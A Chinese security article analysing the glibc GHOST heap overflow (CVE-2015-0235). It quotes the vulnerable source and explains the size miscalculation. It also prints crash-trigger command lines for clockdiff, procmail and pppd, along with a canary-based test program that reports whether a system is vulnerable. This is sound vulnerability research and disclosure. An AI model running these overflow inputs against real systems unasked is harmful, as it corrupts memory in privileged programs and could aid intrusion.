安全脉搏此前发布了最近被媒体炒的比较火的2015年第一个曝出的影响广泛的底层漏洞: CVE-2015-0235:Linux Glibc幽灵漏洞允许黑客远程获取系统权限

一: 概述

__nss_hostname_digits_dots(//glibc/nss/digits_dots.c)函数存在缓冲区溢出漏洞。

该bug通过gethostbyname *()系列函数触发,可远程执行。

ghost-linux-security-vulnerability-e1422513239924

二:分析

__nss_hostname_digits_dots() 是从2.2.2开始引入的。

root@H:/tmp/glibc-2.17# grep -irF '__nss_hostname_digits_dots' ./*
./CANCEL-FCT-WAIVE:__nss_hostname_digits_dots
./ChangeLog.12:	* nss/Versions (libc): Add __nss_hostname_digits_dots to GLIBC_2.2.2.
./ChangeLog.12:	* nss/digits_dots.c (__nss_hostname_digits_dots): Turn template
---snip---
./nss/getXXbyYY.c:      if (__nss_hostname_digits_dots (name, &resbuf, &buffer,
./nss/Versions:    __nss_hostname_digits_dots;
./nss/getXXbyYY_r.c:  switch (__nss_hostname_digits_dots (name, resbuf, &buffer, NULL,
./nss/nsswitch.h:extern int __nss_hostname_digits_dots (const char *name,
./nss/nsswitch.h:libc_hidden_proto (__nss_hostname_digits_dots)
./nss/digits_dots.c:__nss_hostname_digits_dots (const char *name, struct hostent *resbuf,
./nss/digits_dots.c:libc_hidden_def (__nss_hostname_digits_dots)

查找得出该函数由glibc的重入和不可重入版本提供(nss/getXXbyYY.c 和 nss/getXXbyYY_r.c)

#ifdef HANDLE_DIGITS_DOTS
  if (buffer != NULL) //if malloc memory success
    {   
      if (__nss_hostname_digits_dots (name, &resbuf, &buffer,
                                      &buffer_size, 0, &result, NULL, AF_VAL,
                                      H_ERRNO_VAR_P))
        goto done;
    }   
#endif

并由 HANDLE_DIGITS_DOTS 宏来定义

root@H:/tmp/glibc-2.17# grep -irF '#define HANDLE_DIGITS_DOTS' ./*
./inet/gethstbynm.c:#define HANDLE_DIGITS_DOTS	1
./inet/gethstbynm2.c:#define HANDLE_DIGITS_DOTS	1
./inet/gethstbynm_r.c:#define HANDLE_DIGITS_DOTS	1
./inet/gethstbynm2_r.c:#define HANDLE_DIGITS_DOTS	1
./nscd/gethstbynm3_r.c:#define HANDLE_DIGITS_DOTS	1

所以这几个文件对应的函数可能触发该漏洞,__nss_hostname_digits_dots()的目的是避免ipv4和ipv6的地址再去做dns解析导致资源浪费。

/* Copyright (C) 1997, 1999, 2000, 2001, 2004 Free Software Foundation, Inc.
   This file is part of the GNU C Library.
   Contributed by H.J. Lu <[email protected]>, 1997.
 
   The GNU C Library is free software; you can redistribute it and/or
   modify it under the terms of the GNU Lesser General Public
   License as published by the Free Software Foundation; either
   version 2.1 of the License, or (at your option) any later version.
 
   The GNU C Library is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
   Lesser General Public License for more details.
 
   You should have received a copy of the GNU Lesser General Public
   License along with the GNU C Library; if not, see
   <http://www.gnu.org/licenses/>.  */
 
#include <assert.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <wctype.h>
#include <resolv.h>
#include <netdb.h>
#include <arpa/inet.h>
#include "nsswitch.h"
 
#ifdef USE_NSCD
# define inet_aton __inet_aton
# include <nscd/nscd_proto.h>
#endif
 
int
__nss_hostname_digits_dots (const char *name, struct hostent *resbuf,
			    char **buffer, size_t *buffer_size,
			    size_t buflen, struct hostent **result,
			    enum nss_status *status, int af, int *h_errnop)
{
  int save;
 
  /* We have to test for the use of IPv6 which can only be done by
     examining `_res'.  */
  if (__res_maybe_init (&_res, 0) == -1)
    {
      if (h_errnop)
	*h_errnop = NETDB_INTERNAL;
      *result = NULL;
      return -1;
    }
 
  /*
   * disallow names consisting only of digits/dots, unless
   * they end in a dot.
   */
  if (isdigit (name[0]) || isxdigit (name[0]) || name[0] == ':')
    {
      const char *cp;
      char *hostname;
      typedef unsigned char host_addr_t[16];
      host_addr_t *host_addr;
      typedef char *host_addr_list_t[2];
      host_addr_list_t *h_addr_ptrs;
      char **h_alias_ptr;
      size_t size_needed;
      int addr_size;
 
      switch (af)
	{
	case AF_INET:
	  addr_size = INADDRSZ;
	  break;
 
	case AF_INET6:
	  addr_size = IN6ADDRSZ;
	  break;
 
	default:
	  af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET;
	  addr_size = af == AF_INET6 ? IN6ADDRSZ : INADDRSZ;
	  break;
	}
 
      size_needed = (sizeof (*host_addr)
		     + sizeof (*h_addr_ptrs) + strlen (name) + 1);
 
      if (buffer_size == NULL)
        {
	  if (buflen < size_needed)
	    {
	      if (h_errnop != NULL)
		*h_errnop = TRY_AGAIN;
	      __set_errno (ERANGE);
	      goto done;
	    }
	}
      else if (buffer_size != NULL && *buffer_size < size_needed)
	{
	  char *new_buf;
	  *buffer_size = size_needed;
	  new_buf = (char *) realloc (*buffer, *buffer_size);
 
	  if (new_buf == NULL)
	    {
	      save = errno;
	      free (*buffer);
	      *buffer = NULL;
	      *buffer_size = 0;
	      __set_errno (save);
	      if (h_errnop != NULL)
		*h_errnop = TRY_AGAIN;
	      *result = NULL;
	      goto done;
	    }
	  *buffer = new_buf;
	}
 
      memset (*buffer, '\0', size_needed);
 
      host_addr = (host_addr_t *) *buffer;
      h_addr_ptrs = (host_addr_list_t *)
	((char *) host_addr + sizeof (*host_addr));
      h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));
      hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);
 
      if (isdigit (name[0]))
	{
	  for (cp = name;; ++cp)
	    {
	      if (*cp == '\0')
		{
		  int ok;
 
		  if (*--cp == '.')
		    break;
 
		  /* All-numeric, no dot at the end. Fake up a hostent as if
		     we'd actually done a lookup.  What if someone types
		     255.255.255.255?  The test below will succeed
		     spuriously... ???  */
		  if (af == AF_INET)
		    ok = __inet_aton (name, (struct in_addr *) host_addr);
		  else
		    {
		      assert (af == AF_INET6);
		      ok = inet_pton (af, name, host_addr) > 0;
		    }
		  if (! ok)
		    {
		      *h_errnop = HOST_NOT_FOUND;
		      if (buffer_size)
			*result = NULL;
		      goto done;
		    }
 
		  resbuf->h_name = strcpy (hostname, name);
		  h_alias_ptr[0] = NULL;
		  resbuf->h_aliases = h_alias_ptr;
		  (*h_addr_ptrs)[0] = (char *) host_addr;
		  (*h_addr_ptrs)[1] = NULL;
		  resbuf->h_addr_list = *h_addr_ptrs;
		  if (af == AF_INET && (_res.options & RES_USE_INET6))
		    {
		      /* We need to change the IP v4 address into the
			 IP v6 address.  */
		      char tmp[INADDRSZ];
		      char *p = (char *) host_addr;
		      int i;
 
		      /* Save a copy of the IP v4 address. */
		      memcpy (tmp, host_addr, INADDRSZ);
		      /* Mark this ipv6 addr as a mapped ipv4. */
		      for (i = 0; i < 10; i++)
			*p++ = 0x00;
		      *p++ = 0xff;
		      *p++ = 0xff;
		      /* Copy the IP v4 address. */
		      memcpy (p, tmp, INADDRSZ);
		      resbuf->h_addrtype = AF_INET6;
		      resbuf->h_length = IN6ADDRSZ;
		    }
		  else
		    {
		      resbuf->h_addrtype = af;
		      resbuf->h_length = addr_size;
		    }
		  if (h_errnop != NULL)
		    *h_errnop = NETDB_SUCCESS;
		  if (buffer_size == NULL)
		    *status = NSS_STATUS_SUCCESS;
		  else
		   *result = resbuf;
		  goto done;
		}
 
	      if (!isdigit (*cp) && *cp != '.')
		break;
	    }
	}
 
      if ((isxdigit (name[0]) && strchr (name, ':') != NULL) || name[0] == ':')
	{
	  const char *cp;
	  char *hostname;
	  typedef unsigned char host_addr_t[16];
	  host_addr_t *host_addr;
	  typedef char *host_addr_list_t[2];
	  host_addr_list_t *h_addr_ptrs;
	  size_t size_needed;
	  int addr_size;
 
	  switch (af)
	    {
	    default:
	      af = (_res.options & RES_USE_INET6) ? AF_INET6 : AF_INET;
	      if (af == AF_INET6)
		{
		  addr_size = IN6ADDRSZ;
		  break;
		}
	      /* FALLTHROUGH */
 
	    case AF_INET:
	      /* This is not possible.  We cannot represent an IPv6 address
		 in an `struct in_addr' variable.  */
	      *h_errnop = HOST_NOT_FOUND;
	      *result = NULL;
	      goto done;
 
	    case AF_INET6:
	      addr_size = IN6ADDRSZ;
	      break;
	    }
 
	  size_needed = (sizeof (*host_addr)
			 + sizeof (*h_addr_ptrs) + strlen (name) + 1);
 
	  if (buffer_size == NULL && buflen < size_needed)
	    {
	      if (h_errnop != NULL)
		*h_errnop = TRY_AGAIN;
	      __set_errno (ERANGE);
	      goto done;
	    }
	  else if (buffer_size != NULL && *buffer_size < size_needed)
	    {
	      char *new_buf;
	      *buffer_size = size_needed;
	      new_buf = realloc (*buffer, *buffer_size);
 
	      if (new_buf == NULL)
		{
		  save = errno;
		  free (*buffer);
		  __set_errno (save);
		  *buffer = NULL;
		  *buffer_size = 0;
		  *result = NULL;
		  goto done;
		}
	      *buffer = new_buf;
	    }
 
	  memset (*buffer, '\0', size_needed);
 
	  host_addr = (host_addr_t *) *buffer;
	  h_addr_ptrs = (host_addr_list_t *)
	    ((char *) host_addr + sizeof (*host_addr));
	  hostname = (char *) h_addr_ptrs + sizeof (*h_addr_ptrs);
 
	  for (cp = name;; ++cp)
	    {
	      if (!*cp)
		{
		  if (*--cp == '.')
		    break;
 
		  /* All-IPv6-legal, no dot at the end. Fake up a
		     hostent as if we'd actually done a lookup.  */
		  if (inet_pton (AF_INET6, name, host_addr) <= 0)
		    {
		      *h_errnop = HOST_NOT_FOUND;
		      if (buffer_size)
			*result = NULL;
		      goto done;
		    }
 
		  resbuf->h_name = strcpy (hostname, name);
		  h_alias_ptr[0] = NULL;
		  resbuf->h_aliases = h_alias_ptr;
		  (*h_addr_ptrs)[0] = (char *) host_addr;
		  (*h_addr_ptrs)[1] = (char *) 0;
		  resbuf->h_addr_list = *h_addr_ptrs;
		  resbuf->h_addrtype = AF_INET6;
		  resbuf->h_length = addr_size;
		  *h_errnop = NETDB_SUCCESS;
		  if (buffer_size == NULL)
		    *status = NSS_STATUS_SUCCESS;
		  else
		    *result = resbuf;
		  goto done;
		}
 
	      if (!isxdigit (*cp) && *cp != ':' && *cp != '.')
		break;
	    }
	}
    }
 
  return 0;
 
done:
  return 1;
}
libc_hidden_def (__nss_hostname_digits_dots)

 

85行size_needed决定了缓存区的大小 只包括了 *host_addr, *h_addr_ptrs, name的大小,后面121行却存储着四个数据的地址,host_addr, h_addr_ptrs, h_alias_ptr, hostname, 在计算长度时漏掉了h_alias_ptr,即一个char指针的大小,32位为4个字节,64位为8个字节。88-117行保证缓存区足够大,88-97行是函数重入的分支,98-117是非重入的分支。157行的strcpy可以触发缓存区溢出。

为了在157行触发溢出,主机名必须符合下列条件:

- 它的第一个字符必须是数字(Ln 127) 。
 - 它的最后一个字符不能是点 “.”(Ln 135 ) 。
 - 它必须只包含数字和点(Ln 197 ) (我们称之为“数字和点”的要求) 。
 - 它必须足够长以溢出缓冲区。例如,非重入的gethostbyname *()函数最开始就会通过调用malloc (1024)来分配自己的缓冲区 (申请 “1 KB”) 。
 - 地址必须成功地解析为IPv4地址。该解析由INET_ATON()(Ln 143)完成 ,或作为inet_pton IPv6地址() (Ln 147)

但是经过分析inet_pton 和 inet_aton 这2个函数,得出如下结论(200行出的strcpy是处理ipv6的,由于ipv6的限制,不能触发溢出。)

 147行的inet_ption中当吧hostname解析为ipv6的地址时,':'是不非法字符,所以地址族为AF_INET6时,是不会触发的。
  
  inet_aton处是唯一一处可以出发溢出的,并且主机名必须具有一下格式:"a.b.c.d","a.b.c","a",a,b,c,d 必须是无符号整数,最大0xffffffff,可以被strtoul函数成功的转换为10进制或8进制(由于'x'和'X'在此处是非法字符,所以不能为16进制)

 

三:案例分析

目前为止,下面的程序被证实存在该漏洞

clockdiff

root@h-virtual-machine:~# clockdiff $(python -c "print '0' * $((0x20000-16*1-2*4-1-4))")
Segmentation fault (core dumped)

调用gethostbyname,执行__strdup时溢出

root@h-virtual-machine:~# ltrace clockdiff $(python -c "print '0' * $((0x20000-16*1-2*4-1-4))")
__libc_start_main(0x8048960, 2, 0xbfb52774, 0x8049cd0, 0x8049d40 <unfinished ...>
socket(2, 3, 1)                                  = 3
__errno_location()                               = 0xb75d08c8
getuid()                                         = 0
setuid(0)                                        = 0
fileno(0xb7778ac0)                               = 0
isatty(0)                                        = 1
fileno(0xb7778a20)                               = 1
isatty(1)                                        = 1
getpid()                                         = 9907
gethostname("h-virtual-machine", 1025)           = 0
gethostbyname("h-virtual-machine")               = 0xb777aef8
__strdup(0x91d502a, 1025, 1, 64, 4)              = 0x91d55f0
gethostbyname("00000000000000000000000000000000"...) = 0xb777aef8
__strdup(0x91d5cec, 1025, 1, 64, 4 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

procmail

root@h-virtual-machine:~# ltrace /usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null
----snip---
socket(2, 2, 17)                                                                                                                    = 4
strlen("root@8:/var/mail/root")                                                                                                     = 21
sendto(4, 0x83358c8, 21, 0, 0x805d7f8)                                                                                              = 21
close(4)                                                                                                                            = 0
strlen("procmail")                                                                                                                  = 8
memmove(0x8337168, 0x80580e3, 8, 0x10000000, 1)                                                                                     = 0x8337168
strlen(": ")                                                                                                                        = 2
memmove(0x8337170, 0x8058d78, 2, 0x10000000, 1)                                                                                     = 0x8337170
time(NULL)                                                                                                                          = 1422509804
strlen("Notified comsat:")                                                                                                          = 16
memmove(0x8337172, 0x8059416, 16, 0x10000000, 1)                                                                                    = 0x8337172
strlen(" "")                                                                                                                        = 2
memmove(0x8337182, 0x80580ef, 2, 0, 0x8048838)                                                                                      = 0x8337182
strlen("root@8:/var/mail/root")                                                                                                     = 21
memmove(0x8337184, 0x83358c8, 21, 0, 0x8048838)                                                                                     = 0x8337184
strlen(""\n")                                                                                                                       = 2
memmove(0x8337199, 0x80580ec, 2, 0x83358c8, 0x83358c8)                                                                              = 0x8337199
write(2, "procmail: Notified comsat: "root"..., 51procmail: Notified comsat: "root@8:/var/mail/root"
)                                                                                 = 51
malloc(280)                                                                                                                         = 0x08337ee8
free(0x08337ee8*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x08337ee8 ***

 

由于破坏了内存结构,在free时出错。

pppd

root@h-virtual-machine:~# /usr/sbin/pppd 'dryrun' 'ms-dns' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'
*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x09955920 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x75f12)[0xb75b6f12]
/lib/i386-linux-gnu/libc.so.6(+0x65de5)[0xb75a6de5]
/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb75a6e1b]
/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]
/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]
/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]
/usr/sbin/pppd(main+0x1cf)[0x8050b2f]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb755a4e3]
======= Memory map: ========
08048000-08087000 r-xp 00000000 fd:01 11976      /usr/sbin/pppd
08087000-08088000 r--p 0003e000 fd:01 11976      /usr/sbin/pppd
08088000-0808c000 rw-p 0003f000 fd:01 11976      /usr/sbin/pppd
0808c000-080d9000 rw-p 00000000 00:00 0 
09952000-09973000 rw-p 00000000 00:00 0          [heap]
b74d5000-b74f1000 r-xp 00000000 fd:01 265720     /lib/i386-linux-gnu/libgcc_s.so.1
b74f1000-b74f2000 r--p 0001b000 fd:01 265720     /lib/i386-linux-gnu/libgcc_s.so.1
b74f2000-b74f3000 rw-p 0001c000 fd:01 265720     /lib/i386-linux-gnu/libgcc_s.so.1
b7503000-b750e000 r-xp 00000000 fd:01 265750     /lib/i386-linux-gnu/libnss_files-2.15.so
b750e000-b750f000 r--p 0000a000 fd:01 265750     /lib/i386-linux-gnu/libnss_files-2.15.so
b750f000-b7510000 rw-p 0000b000 fd:01 265750     /lib/i386-linux-gnu/libnss_files-2.15.so
b7510000-b751a000 r-xp 00000000 fd:01 265754     /lib/i386-linux-gnu/libnss_nis-2.15.so
b751a000-b751b000 r--p 00009000 fd:01 265754     /lib/i386-linux-gnu/libnss_nis-2.15.so
b751b000-b751c000 rw-p 0000a000 fd:01 265754     /lib/i386-linux-gnu/libnss_nis-2.15.so
b751c000-b7532000 r-xp 00000000 fd:01 265744     /lib/i386-linux-gnu/libnsl-2.15.so
b7532000-b7533000 r--p 00015000 fd:01 265744     /lib/i386-linux-gnu/libnsl-2.15.so
b7533000-b7534000 rw-p 00016000 fd:01 265744     /lib/i386-linux-gnu/libnsl-2.15.so
b7534000-b7536000 rw-p 00000000 00:00 0 
b7536000-b753d000 r-xp 00000000 fd:01 265746     /lib/i386-linux-gnu/libnss_compat-2.15.so
b753d000-b753e000 r--p 00006000 fd:01 265746     /lib/i386-linux-gnu/libnss_compat-2.15.so
b753e000-b753f000 rw-p 00007000 fd:01 265746     /lib/i386-linux-gnu/libnss_compat-2.15.so
b753f000-b7541000 rw-p 00000000 00:00 0 
b7541000-b76e5000 r-xp 00000000 fd:01 265699     /lib/i386-linux-gnu/libc-2.15.so
b76e5000-b76e6000 ---p 001a4000 fd:01 265699     /lib/i386-linux-gnu/libc-2.15.so
b76e6000-b76e8000 r--p 001a4000 fd:01 265699     /lib/i386-linux-gnu/libc-2.15.so
b76e8000-b76e9000 rw-p 001a6000 fd:01 265699     /lib/i386-linux-gnu/libc-2.15.so
b76e9000-b76ec000 rw-p 00000000 00:00 0 
b76ec000-b7720000 r-xp 00000000 fd:01 5019       /usr/lib/i386-linux-gnu/libpcap.so.1.1.1
b7720000-b7721000 ---p 00034000 fd:01 5019       /usr/lib/i386-linux-gnu/libpcap.so.1.1.1
b7721000-b7722000 r--p 00034000 fd:01 5019       /usr/lib/i386-linux-gnu/libpcap.so.1.1.1
b7722000-b7723000 rw-p 00035000 fd:01 5019       /usr/lib/i386-linux-gnu/libpcap.so.1.1.1
b7723000-b7726000 r-xp 00000000 fd:01 265712     /lib/i386-linux-gnu/libdl-2.15.so
b7726000-b7727000 r--p 00002000 fd:01 265712     /lib/i386-linux-gnu/libdl-2.15.so
b7727000-b7728000 rw-p 00003000 fd:01 265712     /lib/i386-linux-gnu/libdl-2.15.so
b7728000-b7734000 r-xp 00000000 fd:01 265761     /lib/i386-linux-gnu/libpam.so.0.83.0
b7734000-b7735000 r--p 0000b000 fd:01 265761     /lib/i386-linux-gnu/libpam.so.0.83.0
b7735000-b7736000 rw-p 0000c000 fd:01 265761     /lib/i386-linux-gnu/libpam.so.0.83.0
b7736000-b7737000 rw-p 00000000 00:00 0 
b7737000-b773f000 r-xp 00000000 fd:01 265707     /lib/i386-linux-gnu/libcrypt-2.15.so
b773f000-b7740000 r--p 00007000 fd:01 265707     /lib/i386-linux-gnu/libcrypt-2.15.so
b7740000-b7741000 rw-p 00008000 fd:01 265707     /lib/i386-linux-gnu/libcrypt-2.15.so
b7741000-b7768000 rw-p 00000000 00:00 0 
b7768000-b776a000 r-xp 00000000 fd:01 265803     /lib/i386-linux-gnu/libutil-2.15.so
b776a000-b776b000 r--p 00001000 fd:01 265803     /lib/i386-linux-gnu/libutil-2.15.so
b776b000-b776c000 rw-p 00002000 fd:01 265803     /lib/i386-linux-gnu/libutil-2.15.so
b777b000-b777e000 rw-p 00000000 00:00 0 
b777e000-b777f000 r-xp 00000000 00:00 0          [vdso]
b777f000-b779f000 r-xp 00000000 fd:01 265679     /lib/i386-linux-gnu/ld-2.15.so
b779f000-b77a0000 r--p 0001f000 fd:01 265679     /lib/i386-linux-gnu/ld-2.15.so
b77a0000-b77a1000 rw-p 00020000 fd:01 265679     /lib/i386-linux-gnu/ld-2.15.so
bfbb6000-bfbd8000 rw-p 00000000 00:00 0          [stack]
Aborted (core dumped)

 

pppd的ms-wins和socket选项也存在同样的问题。

glibc(补丁2013年5月21日就发布过了,不过没有引起重视).

查看有那些服务用了glibc, 用了这系列函数都有可能是潜在的威胁。

root@H:/tmp# lsof | grep libc | awk '{print $1}' | sort | uniq
accounts-
awk
bash
Cache
--snip--
gvfs-gpho
httpd

 

四:影响

服务器上gethostbyname() 函数用的挺多。许多DNS解析服务都可能会和这个漏洞有关。毕竟是底层库,影响还是挺大的。

·邮件服务器连接IP时,使用的DNS反查,DNS黑名单,SPF等机制
·表单提交时,绕过允许用户内容导致一个DNS查询时,比如URL,WordPress的XML-RPC pingback等
·MySQL服务器做基于主机名的认证检查时(以MySQL权限)
·SSH服务器对允许/拒绝规则认证时,使用DNS查询的
·php中也有部分文件引用了这个函数。

 

可以用ltrace命令来看下是否用到了getbyhostname这类函数。

DNS查询都可能会触发这个漏洞,幸运的是漏洞并不会立刻造成提权,但是结合其他的漏洞或者bug导致提权就不得而知了。

 

五:poc

测试方法:

gcc secpulse.c -o CVE-2015-0235
 
./CVE-2015-0235

secpulse.c

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
 
#define CANARY "in_the_coal_mine"
 
struct {
 char buffer[1024];
 char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
 
int main(void) {
 puts ("SecPulse.com Hint Your glibc version is:\t");
 puts(gnu_get_libc_version ());
 struct hostent resbuf;
 struct hostent *result;
 int herrno;
 int retval;
 
 /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
 size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
 char name[sizeof(temp.buffer)];
 memset(name, '0', len);
 name[len] = '\0';
 
 retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
 
 if (strcmp(temp.canary, CANARY) != 0) {
 puts("vulnerable");
 exit(EXIT_SUCCESS);
 }
 if (retval == ERANGE) {
 puts("not vulnerable");
 exit(EXIT_SUCCESS);
 }
 puts("should not happen");
 exit(EXIT_FAILURE);
}

 

修复方案

执行glibc升级命令

RHEL、Fedora、CentOS系统

Debian、Ubuntu系统

update之后如果未生效,要重启依赖glibc的进程。

 

【本文来源:CVE 2015-0235:Ghost glibc 缓存区溢出漏洞分析   SP小编整理发布】

 

源链接

Hacking more

...